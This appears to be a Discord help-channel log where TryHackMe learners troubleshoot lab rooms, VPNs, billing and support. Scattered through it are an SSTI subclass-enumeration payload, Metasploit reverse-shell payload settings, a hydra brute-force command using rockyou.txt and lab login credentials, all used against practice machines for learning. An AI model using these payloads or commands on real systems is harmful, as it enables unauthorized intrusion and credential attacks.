"Filter on Event ID 4104. What was the 2nd command executed in the PowerShell session?"

I filtered for Event ID 4104, but there are no commands, so I got stuck. I tried googling the answer, thinking it would make sense once I saw it and then I could work backwards from there—but "||whoami||" does not appear in the logs.

How do I find the answer?

thanks for your help, but i now try it on the attack box and im still getting 16 valid passwords...

Gave +1 Rep to @vagrant fern (current: #11 - 935)

i dont know what im missing or where i make the mistake

hey everyone i need help with a crypto challenge
spending days and night on it help a brother

i dm'd you my solution

guys

hello

in the ssti wep applicatio testing room

i have an issue with the vm so i try the payload and its giving me an eroor in the page like someon can give me the answerin task 6on;y

I will try to do a smoke test after work and let you knkw

Is this a THM room?

i need help in TuteDude cybersecurity

the question is
Use any Text Editor and edit the content of the read_secret.sh. Inside that file, write a script to read the contents of secret.txt. What is inside secret.txt?

but in the .ova file that they've given

it says i can't even write the file nor i can use sudo

can anyone help

Hi, im stuck again at metasploitexploitation task 6. Ive made the shell.elf file it is on the other vm and i run the msfconsole multi/handler and i set the payload on linux/x64/meterpreter/reverse_tcp set the lhost on the correct ip and port 4444. I ran it in the attackbox and ran the file om the other but it gets illegal instruction( core dumped), in the attack box i see sending stage but no connect session

Can you try a non-staged payload?

Found it i was using the wrong envirement x86 instead of x64.

not really

hi i'm still in the Pre Security path i just finshed Network Fundamentals and i want to ask if there is any challenges can be solved with this level or i need to reach Cyber Security 101 to have the knowledge to do one of them

Hello. Does the EASTER2026 discount add to the student discount? The student discount is 20% and EASTER2026 discount is 36%. If id does add up, how can I manage to do it? Thanks!

I forgot to mention that I'm asking this for the annual subscription

hey, im doing the water bottle room and im having hard times finding the correct format

i asked the same thing for the black friday sale and everyone told me that tryhackme is offering the highes possible discount without adding up the discounts. If im not mistaken the student disc is better than the easter one so you should be only getting this one

i have found the name and the correct phone number, but i think im doing something wrong with the format

false alarm i found it

hi! I am new. where do i buy cyber security full courses or computer science full courses? as a beginner?

#start-here

any idea why does it not work?

If I open the exact same link it doesnt get me on the site as it should

and this has happened to me in more rooms

check for /etc/hosts whether it is already configured.

Thank you

Gave +1 Rep to @analog heath (current: #660 - 12)

done?

I guess I'll need to switch VPN from France back to Germany

had problems with this before

THM's a great choice , majority of the content is free 🙂

so I bought it for nothing ?! ||jk||

aaaaa I put coma instead of dot to /etc/hosts ;-;
Feeling silly

happens 😁

I am doing cat pictures and after using knock to knock each port ftp port is still refusing connection am i doing anything wrong? I already restarted machine and checked write up says exactly as I am doing.

what do you want to do?

if you know for you can loop between these ports with short delays , instead of knock.

ftp should open after knocking on this ports and i can use for but knock does literally same thing

when taking the certification exams, are you allowed to revert to some of the prior rooms when stuck during the exam? Or is that considered cheating?

Hi

If it isn't a THM room, its tricky for folks to help as we aren't certain if its an assignment, an active CTF or anything that might be considered as cheating.

I don't think it does. 36% is pretty decent already as the highest discount I got was 35% 😅

Anyone know how to fix flag1 not working in "Attacking ICS Plant #2"? My solution is the same as in the walkthroughs and I reset the machine a bunch of times, but it's still not appearing

need help with microsoft defender room

Need help recovering account

error message "You can't activate workloads that haven't been turned on or onboarded. To find out which services need to be activated, view workload settings."

Have you dropped an email to THM Support? They don't work on weekends though

i did

When?

It might take time for them to come back due to the Easter holiday the other week so they may still be catching up on tickets

Yesterday

Easter was almost 7 days ago. Users need a great experience the moment they sign up.

Typically, response time is between 3 to 5 days.

sure thing. I'll wait.tried to configure myself but everything is greyed out.

hey! I am doing https://tryhackme.com/room/networkingcoreprotocols room but I am stuck on the pop3 task-7
The challenge requires me to pull 4th message from the server but when I telnet on port 110 and try to RETR 4, it throws error

telnet 10.49.172.216 110
Trying 10.49.172.216...
Connected to 10.49.172.216.
Escape character is '^]'.
+OK Dovecot (Ubuntu) ready.
AUTH
+OK
.
USER linda
-ERR [AUTH] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.

I have tried openssl and that fails with renegotiation error

openssl s_client -connect 10.49.172.216:995 (as well as 110)
+OK Dovecot (Ubuntu) ready.
AUTH
+OK
PLAIN
.
USER linda
+OK
PASS Pa$$123
+OK Logged in.
RETR 4
RENEGOTIATING
ERROR
4027AD8F1F7F0000:error:0A00010A:SSL routines:can_renegotiate:wrong ssl version:../ssl/ssl_lib.c:2892:

I have tried forcing tls 1.2 as well but no go there. Curl is also failing.
Any idea what's up here. The example simply telnets on port 110

nevermind - known bug and closed

hey ✌️ need some help
CTF / Silver Platter

i checked out the ports with nmap and found open ports 22, 80. so i tried to enumerate the website and stuff, but got stucked. now i checked some write ups and all of them found also port 8080, but on my scan it doesnt shows up.
nmap -A -p- < IP_ADRESS >
nmap -sC -sV -T4 < IP_ADRESS>

even when i look for http://<IP_ADRESS>:8080 nothing happens. write ups says port 8080 is the way to get further on the ctf.

can someone help me or is the room just broken ?

thanks in advance🙏

I'm stuck on https://tryhackme.com/room/summit with the Fifth Flag / Sample5.exe

I understand that I need to create a behavioural rule, but I can't see how to do that in the PicoSecure lab. None of the options including the Sigma Rule Builder seems to have the relevant options?

Can someone please help?

Thanks ❤️

[Azure: Tapper] Can admin please reset MFA on gumby ❤️

Hi,
You're on the right track, you need to create a behavioral rule based on the information received from previous task, which should be a type of log.

Hmm, using the Sigma Rule Builder?

I can't see a way of doing it in there :S

I've tried Process Creation, FIle Creation and Modification, Network Connections, Registry Modifications. None jhave what's needed

The Web Server Logs, VPN Logs, or Applications Logs have it either

The Malware Sandbox for sample5.exe seems really dumbed down as it doesn't give me the location of the files that I could create a block for either

Has anyone else been able to pass this room?

Please if someone can DM me or at least tell me WHERE inside PicoSecure I should I looking as I feel like I'm taking crazy pills here

https://giphy.com/gifs/panic-stressed-1FMaabePDEfgk

Even Echo AI is telling me to go somewhere that doesn't exist lol:

To create a host artifact rule, you need to navigate to the detections/configuration area in PicoSecure and enter a distinctive file path or name related to 'sample5.exe' in the 'Host artifact' field. Then, save and enable the rule to start detecting this artifact.

I've tried every type of rule using Sigma but always get "This rule was not able to detect the sample. You may want to try another rule category."

🥺

Either no one that's viewed my messages knows, or no one is willing to help.

Both options reduce my faith with THM, but I'm edging my bets on the latter.

Raised it as a bug. Doubt it will get looked into by the time my sub runs out in 4 days, so cancelling until it's sorted.

Hi, it is not a bug

Ofc it is. If the AI says to do something that's not in the lab. It's broken

You just have to create a rule with Sigma Builder. Hint: this log is a network one. You just need to analyze it, see if there's a pattern.

I just went through it all again, just to check! And it just work!

Thanks for the assist Alex. You've put all the mods and THM staff to shame as none of them were willing to help at all.

Mate, you just have to create a rule with Sigma Rule Builder based on Network Connections as log given is network related.

Just need to fill in the fields with the correct inputs for Remote IP:*
Remote Port:*
Size (bytes):*
Frequency (seconds):*
ATT&CK ID:*

Hope this helps!

Thank you so much

No worries!

Have fun!

Cheers

Hmm, I would post a screenshot of what I'm doing, but this discord doesn't seem to allow it?

The pattern I can see is 51.102.10.19 every 30mins or 1800 seconds at 97 bytes on port 443.

But I'm getting an incorrect IP

To post a screenshot, you need to get verified

Type /verify and paste the discord token in your thm profile page

Keep trying to do room https://tryhackme.com/room/windowsbasics but does anyone know why the machine keeps freezing when needing to do the machine for the answers?

litterally opening it and terminating it over 30 times to get the answers filled out.

Managed to get the answers slowly but surely. but not sure why the room kept freezing up.

Guys im connected to vpn but pinging doesnt work ( not getting replies from the target ip). Any idea?

anyone?

Is it a windows box perchance?

nah web stuff

Which room is it?

takeover

Evening Guys any Senior Soc Analyst Here ?

Hello, i am new here, i am beginner to cybersecurity and i will need all the help i can get.

Hello, I learning on room Exploiting Active Directory(https://tryhackme.com/room/exploitingad) but stuck on Task 7. After run Rubeus it erro [X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP. I try to create new cert., sign out and sign in and reset network still not working. Is a issue of room or I do any thing wrong?

Suggest to ask this in #cyber-and-careers

Hello, i am new here, i am beginner to cybersecurity and i will need all the help i can get.

Hello,

I am new here and a beginner in cybersecurity. I need help with an issue I am facing while trying to connect via SSH.

Below is the exact command and output I received:

root@ip-10-49-106-155:~# ssh tryhackme@10.49.161.19
The authenticity of host '10.49.161.19 (10.49.161.19)' can't be established.
ECDSA key fingerprint is SHA256: fdL9DqB6Mqw+NAda7rhWB91+loeKYMMe4Bhs/nQfot4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.49.161.19' (ECDSA) to the list of known hosts

tryhackme@10.49.161.19's password:
Permission denied, please try again.
tryhackme@10.49.161.19's password:

I am unable to log in even after entering the password. Could you please help me understand what might be causing this issue and how I can resolve it?

Hi @stuck zenith what room are you working on?
Are you using the attackbox or your own system with a vpn?

Networking Core Protocols using the attackbox

And which question are you on?
In this room i am not seeing where you should use ssh

When was the x.com record created? Provide the answer in YYYY-MM-DD format.

you dont need ssh

try the following "whois x.com"

thanx

https://giphy.com/gifs/pudgypenguins-penguin-pudgy-youre-welcome-E136ihXhzuG2OnxKen

guys n the web app pentesting path

on ssti jinja2 part i found teh flag.txt but i cant cat it its making an internal server error so i dont know maybe the payload is wrong so i need help

do u had enough permissions to read the flag?

if u had a shell, type ls -la

its a web app

which room?

web application pentesting > injection attacks > sever side template injection

@analog heath

task 6

injection attacks are *@#$#$@$!

that task already said, check_output will check for single string only, if you are typing cat flag.txt then it will be as it as as ls -la and task already told that doesn't work.

so type as single string

like

'cat','flag,txt'

in check_output(['cat','flag.txt'])

i did

its redirecting me to internal server error

wait let me check.

@lusty saddle yeah it's true, its showing 'internal server error'.

Alr so there is an issue with the room we have to report right ?

im checking more ways, if really its an issue, yeah we can report it.

@lusty saddle What payload you were trying?

i got the flag btw.

hidden file is 5d8bea6df83cbb6767a235c4ba5493**.txt

Oh this one is different how u did it ?

i mean what payload you were using? and did u use the same index as given in task? its not correct, i first try to read memory, see you will get the actual index number with this payload {{ "".__class__.__mro__[1].__subclasses__() }} and got 422 items, then index must be 421.

https://tryhackme.com/room/offensivesecurityintrokKx12l39?taskNo=3&sharerId=69db8af893ad91c703dd1ebe

Hey i'm having a problem in the room Upload Vulnerabilities(https://tryhackme.com/room/uploadvulns)

On task 8, i have to upload a shell on the website annex.uploadvulns.thm using a CLI

It has 3 commands
select : to select a file
upload : upload the selected file
chosen : output the name of the selected file

I select a file and I verify the name of the file with chosen
Everything is right but when i upload I get a message saying
File must be chosen before being uploaded. Type "help" for syntax

I dont know if anyone had that issue and was able to fix it

Im at room https://tryhackme.com/room/metasploitexploitation task 5. I've set my LHOST to my attack box which is 10.67.75.20 and my RHOSTS to the target (turned on of course) 10.67.152.25 but it keeps telling me the reverse shell connection failed.

Is anyone having issues with windows labs? like they are just not turning on?

Can I get help on this?

https://tryhackme.com/room/introtoisac

The room owner has locked this room, which means you cannot view any task content.

screenshot of your show options in msfconsole please

Can't paste screenshots

plan b paste your terminal output enclose it in triple backticks (`) for clarity like

this

you can also verify https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account

Hello World!

Ok will do

Ok, now i have moved on tho i'm on task 6 and the reverse php is giving me errors.

(Not an excersise just following the explanations)

the error message tells you... port not available. Switch ports, or reset msfconsole or manually kill the process

Ok now im doing the exercise, i have created the elf file and i'm tryiing to launch the http server and is just stuck and it doesn't move, it's been 3 minutes already.

hard to see what you are doing - i will spin up the lab

Thank you very much i've been stuck for weeks on the metasploit section

sometimes not working or maybe i'm doing something wrong

Can we jump into a channel or call?

Made it work

Trapped again

gg! - i have a shell working so are you good?

Yes i found a youtube video

The thing is i didn't give permissions to the elf file

but there was no explanation about that on the room

had to look for it

agree - instructions are a bit vague and apply to many use case - the room encourages research and exploration - which you did - that's a great thing - welcome to cyber - it's 90% troubleshooting

it gets easier trust me, havent seen that room in over 4 yrs, prolly took me "weeks" back then - now under 30 min

i have a dream

to live off of CS

stay consistent, stay curious - you got this

hello
can i have help
i have ctf challenge and i wanna help

Im trappedi n BLUE now, i've been in this task 1 hour, and i can't make it work

It's not turning the session into a meterpreter

I had to look for the flags and the passwords online, because i was unable to make the session into a meterpreter

even with AI or with videos

If you guys can look into it so i can go back, i'll gladly appreciate it

your payload is incorrect- keep in mind you can't follow the room's instructions to the letter, you need to learn the tool enough or "trial and error" it for the lab's use case

Which was the payload? i'm following the excercise explicitly said to use that payload

set payload windows/x64/shell/reverse_tcp

that's your issue and what i've tried to convey to you - instructions are not meant to be followed explicitly - guide only

think of the room as giving you use cases and extrapolating what you learn to different use cases, either by logical deduction, trial and error or further research

ok. we'll rest and try tomorrrow with a fresh mind

yes, as tempting as it might be to give you the solution, it would be a disservice to your learning

Hey I am not getting help on site support- I am doing a room Networking Core Protocols
The AI help bot told me the MACHINE _IP, i posted this in the site support room and no matter how hard I try i can't connect via telnet

root@ip-10-66-123-247:~# telnet 10.10.41.192 80
Trying 10.10.41.192...
telnet: Unable to connect to remote host: Connection timed out

also I went to a Kali linux box and tried this root@ip-10-65-127-151:~# nc -zv 10.10.41.192 80
nc: connect to 10.10.41.192 port 80 (tcp) failed: Connection timed out
root@ip-10-65-127-151:~#
I googled nc to see if i could check the connection and this keeps happening

guys, this shitty room is broken:

it doesn't fire any jenkins webhook, any ideas?

@steel ginkgo Hey how did you add the screen shot

ctrl + v

thx you

telnet not working

yes i did it on port 80 still doesn't work

thx u

Gave +1 Rep to @steel ginkgo (current: #3715 - 1)

link to room please? if it's this one, i'd move on to the next lab, not worth the trouble. Kindly report it to THM support in this channel: #1333993673381253162 https://www.reddit.com/r/tryhackme/comments/1p8vb8z/devsecops_cicd_and_build_security_task_6_jenkins/

I am working on task 10 in the Windows Forensic 1 room and am having trouble identifying the GUID...
Does anyone know how to identify them??

can some on explain what I am doing wrong. I am in the logs fundamentals room and am on task 4, when i try to interact with the access.log nothing happens.

nevermind fixed the above

Greetings. Professional in the financial services industry, owner/founder of a consulting think tank. Keen interest in acquiring and developing tech skills. Thanks.

Hi, am connie

hi

What was your solution?
When you link the room, and share your solution, the next ppl to have the same issue should be able to find your posts to self-solve (faster than waiting with 🤞 to someone random to help)

Link, please; also, what have you tried?

hey guys I'm having a little trouble with the looking glass medium room

anyone there that can help me out?

I got stuck after logging in initially and while trying to switch accounts I found multiple difficulties, so I went through a walkthrough and apparently the initial account I log into should have sudo perms for a command but I dont have any sudo perms apparently

Heyyy tysm i successfully resolved the issue by myself

#room-help message

I was in the wrong directory, the access.log for the room is in the rooms directory.

Hi, I'm Favour. I joined this group recently and I'm a newbie to cybersecurity. How can I begin or start my journey to cybersecurity? What are the available courses I can take?

Hi. Is RCE via telephone call or sms possible? How to track it?

#start-here

Anybody know why or what is that? Exceed capacity like competly (all machines are used, or i used capacity or what?)

i have the same issue 🙁

Don’t you have any other active machines?

Nope, i always make sure that i terminate them

probably all machines are in used

same

@stoic notch so dont worry, and come back later. Probably all machines are being used

or maybe error

but i am not sure, not an profession at THM

just starting

THM is rolling out something pretty big in a while so they could be doing some last-minute testing

maybe new koth machine would be nice xD

shouldnt there be a notification or what?

koth = king of the hill? xd?

Nahh (sadly)

it will never happen

I’m kinda thinking of asking staff whether koth is a dead project or are there any improvements in this field planned. But I think they might have some bigger things to tackle now

wat

you are not alone, read content above your message

bruh

for me its working rn

nvm, still not working

But machine is deployed, that’s good

yep, good but still not working 100%, you will be stuck on (photo) and cant move further 😄

well, at least i can get break

nvm

i am in

Task 4 pénétration testing

I need a help plz

Hey all, I'm still struggling with room/summit

As far as I can see I'm doing it correctly, and can't see any other pattern in the log file.

Please if someone can help me further I would really appreciate it.

This task completely ruined my Saturday as I just couldn't let it go and due to my health condition couldn't get on with anything else.

I'm really hoping I can get past this tonight 🥺

🥺

Hi all, I'm struggling with Metasploit: Exploitation Task5. I just can't get my head around it... The question is What is the content of the flag.txt file? and I just don't get it. I keep running search -f flag.txt and i get [-] No results from search ... do you have any idea how I can improve my understanding of METASPLOIT. I never intend to be Ethical Hacker, i just wanna stay on Blue Team - I'm looking for answer to this question but I just don't get it...

give me a minute

do you wanna hint or answer?

i guess hint, answer with no improvment of knowledge is pointless 😄

I need so much help with my room please

Sorry, i am not that educated in that.

im stuck on metasploit, sorry i cant help either :/

take a look at this walkthru: https://medium.com/@haircutfish/tryhackme-room-summit-9045eb77d3c0

where?

it's exaplined just above, i don't want to overspam DC 😄

Oh, you are even further than me :DDDDDDDDD so sorry, i cannot assist with that either. But that is basic room, so people will answer it quickly

Sorry for giving you hopes

Can't log in

legend anyway! thank you 🙂

Gave +1 Rep to @worldly trench (current: #3717 - 1)

bro, did you get targets shell/meterpreter session?

paywalled by Medium, annoying but there are other walkthrus if you search

Are you submitting your own room?

@stark dust once you exploit the target's system, and get shell, then you would find your flag directly.

ooooo ffs im such a moron, thank you 😄

Gave +1 Rep to @analog heath (current: #611 - 13)

legend

try this: https://youtu.be/bKiS5_Be4cM?si=OYCmMC7hyjhGYB87&t=1222
Honest question and concern- what about your research abilities still prevents you from getting stuck like this (since Saturday). This is the real cyber skill to sharpen, finding the info you need quickly and efficiently so you can (in this case, keep on moving forward in your studies) - on the job it will be troubleshooting your way forward to complete the task at hand by the deadline.

Thank you so much. I'll take a look when I'm back on my PC 🖥

Gave +1 Rep to @slim bison (current: #448 - 19)

metasploit is just insnane... i don;t get it. I mean i've answered questions but if not youtube video by The Helpful Hacker I wouldn't even shell it...

hello

i'm new here

i was hoping i could get some tips from you guys😅

What kind of tips would you like from us?

don't worry too much about it - OSCP only let's you use it once on the exam, forcing you toward LOL methodology anyway. MSF's relevance in 2026 is narrow. It's useful for internal network pentests against legacy/unmanaged infrastructure, useful as a module library to read and learn from, and useful for the specific cert pipeline that still tests it. Outside those lanes - web apps, modern AD red team ops, anything touching EDR, anything where tradecraft matters - it's a museum piece with good documentation.

Okay, thanks for that update. I’ve also seen some comments on YouTube that people struggle with it as well so sorta made me feel better. There’s so much to learn to become that SOC L1 😅

Gave +1 Rep to @slim bison (current: #427 - 20)

Anyone preparing for OSCP?

hello! im sorry, im at the Active Directory Basics room and im stuck trying to use RDP to complete the task, can someone guide me some guidance on what i should do here?

what is the issue? u can't login with those creds? what is the output and error message?

sorry i think i got it now, i figured it out but thanks 🙂

Gave +1 Rep to @slim bison (current: #412 - 21)

most excellent -fly birdie fly

Hey TryHackMe Team,

I submitted my CTF room EchoTrace (https://tryhackme.com/jr/echotrace) for review about 3 months ago, but the status is still showing as 'Submitted' with no updates.
Could someone please check on it and let me know if any changes are needed or when it might be reviewed?

Thanks!
THM username- A4K45H

Any help with 1st flag of white rabbit? 2nd and 3rd are easy as hell

Just checked with THM Staff and they suggested that you do not share the room link until it goes through THM Staff QA. However, there is a long queue of rooms for review at the moment so they cannot provide an ETA.

Got it from tank 😉

Ok, Thanks 😇

Gave +1 Rep to @vagrant fern (current: #11 - 938)

Hi, I was trying to access the Rabbit Store room. Does it work for you, or are you having issues? I can't connect to the server.

The VM and my VPN are located in the same place

My mistake, I didn't save the domain in hosts.. ahahah

Heeey : D

hi, just another question is it normal that the hydra room takes some time for the login?

yeah, but not too long.

mhmm i placed -f to get the right login i think i did something wrong then

It should take at most 5 minutes

Hey someone here

what should it be if i use the right command but it won't get the password? i'e got the right ip and user molly

What's the command you're using now?

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.129.166.173 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V -f

is this correct?

I don't think you need those /: in http-post-form and you could expand the error message more (as well as remove that F= from there)

it gives errors if i remove that.

I recall I've helped someone either here or on reddit with this exact room - lemme find this convo rq

thnx

Check with burp suite what endpoint does the form send data to and it should work

lol i hate myself i needed to add login to the url....

thnx tho @ashen crane

Np

Dude, thank you so much, I was so frustraded, since I was trying to exploit previous machine

Gave +1 Rep to @slim bison (current: #402 - 22)

yo why does Capability Score keep going down from 50% to 33% to 16%

For the Mobile Malware Analysis room, the VM doesn’t have an active network connection. Is that normal?

Bounty hacker FTP seems to be misconfigured. Its not allowing me to get the two text files. ill provide output one sec

{26-04-14 20:06}parrot:~ saintmichael% ftp -d $target
setupsockbufsize: rcvbuf_size determined as 131072
setupsockbufsize: sndbuf_size determined as 16384
Connected to 10.66.161.42.
220 (vsFTPd 3.0.5)
ftp_login: user `<null>' pass `<null>' host `10.66.161.42'
Name (10.66.161.42:saintmichael): anonymous
---> USER anonymous
230 Login successful.
---> SYST
215 UNIX Type: L8
Remote system type is UNIX.
Using binary mode to transfer files.
---> FEAT
211-Features:
EPRT
MDTM
REST STREAM
SIZE
TVFS
211 End
features[FEAT_FEAT] = 1
features[FEAT_MDTM] = 1
features[FEAT_MLST] = 0
features[FEAT_REST_STREAM] = 1
features[FEAT_SIZE] = 1
features[FEAT_TVFS] = 1
updatelocalcwd: got `/home/saintmichael'
ftp> ls
ftp: setsockopt SO_DEBUG (ignored): Permission denied
---> EPSV
550 Permission denied.
disabling epsv4 for this connection
---> PASV
550 Permission denied.
ftp: setsockopt SO_DEBUG (ignored): Permission denied
---> PORT 192,168,133,88,185,111
200 PORT command successful. Consider using PASV.
---> LIST

421 Service not available, remote server timed out. Connection closed.
ftp>

ls should provide me two text files according to write ups.

I HAVE STUCK IN LLM Security WALKTHROUGH ON TASK 4.2 ANY ONE HELP
Which system component combines system instructions, retrieved data, and user input into a single sequence?

Same, echo gives you the answer but when I put it in, it says it’s wrong.

yes same

this logs into ftp as anonymous as expected - ikely VPN or VM networking is wrong, because the target is being told to connect back to a private 192.168.x.x address instead of the THM Target IP.

ms@Mac ~ % ftp 10.67.175.89                                                                                                                                                [04-14-26 22:57:42]
Connected to 10.67.175.89.
220 (vsFTPd 3.0.5)
Name (10.67.175.89:ms): anonymous
230 Login successful.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 ftp      ftp           418 Jun 07  2020 locks.txt
-rw-rw-r--    1 ftp      ftp            68 Jun 07  2020 task.txt
226 Directory send OK.

its easy "The"

Wow thanks.

Gave +1 Rep to @olive hawk (current: #986 - 7)

Hey everyone!
My name is Williams, I’m a beginner in cybersecurity and ethical hacking. I joined this server to connect with people who have more experience to teach and can guide me in the right direction.
I’m especially looking for a mentor who can put me through my journey of cybersecurity and ethical hacking, share practical advice, and give some direction as I grow in cybersecurity.
Really excited to be here and learn from all of you!

Thanks 🙏🏼

room name Burp Suite: Repeater, but its more about SQLi syntax

yo, guys, who can help me with understanding why do i need 4 nulls in this request? I done the room just because there was walkthrough in the task but still cant understand why it worked out but when i add one more “null” it doesnt. I can see that there is 8 columns in the table, so why is there only 4 nulls?

Guys anyone has done the white rabbit

Llm challenge

I have 2 flags, but I am not sure where to look for 3rd flag

I'm stuck for 1st flag, rest found

should i complete this? room will questions from vim appear in sal 1 exam?

idk I prefer Nano its much simpler and easier in my opinion

ikr but chatgpt says vim is important for ethical hacking and ctf

It's not specifically important for those things but it's widely used and you should at least know how to search, insert text, save, and quit imo.

i really wouldnt rely on ChatGPT

okayy

Can someone tell me the command for this problem?

Hey everyone 👋
I'm stuck on 'Intro to Offensive Security' room, Task 1.
Question: What option allows you to change the IP route?
I tried 'sudo' but it's wrong. Can anyone give me a hint please?

Hi

Can you share the room link pls

Hey, sorry to bother, I can't Download Task Files from room "Missing Person". I click the button but nothing happens. Is there any way I can get the zip by any chance?

its working, try again.

if not, then i can send you by transfernow if want.

Tried again, still nothing.
I think I always have this issue whenever I have to download files from a room. Maybe it's a client side issue?
I may have to accept your transfer this time if you're still ok, then I'll investigate further.

sure

got it?

hii all

Thank you very much @analog heath !

Gave +1 Rep to @analog heath (current: #569 - 14)

you can also try from different browser, may it works.

Hello! Am i the only one that cannot deploy the machine in the room ItsyBitsy ? (To access kibana)

Whats with this quirk?How can i proceed further..

which room is this?

windows adbasics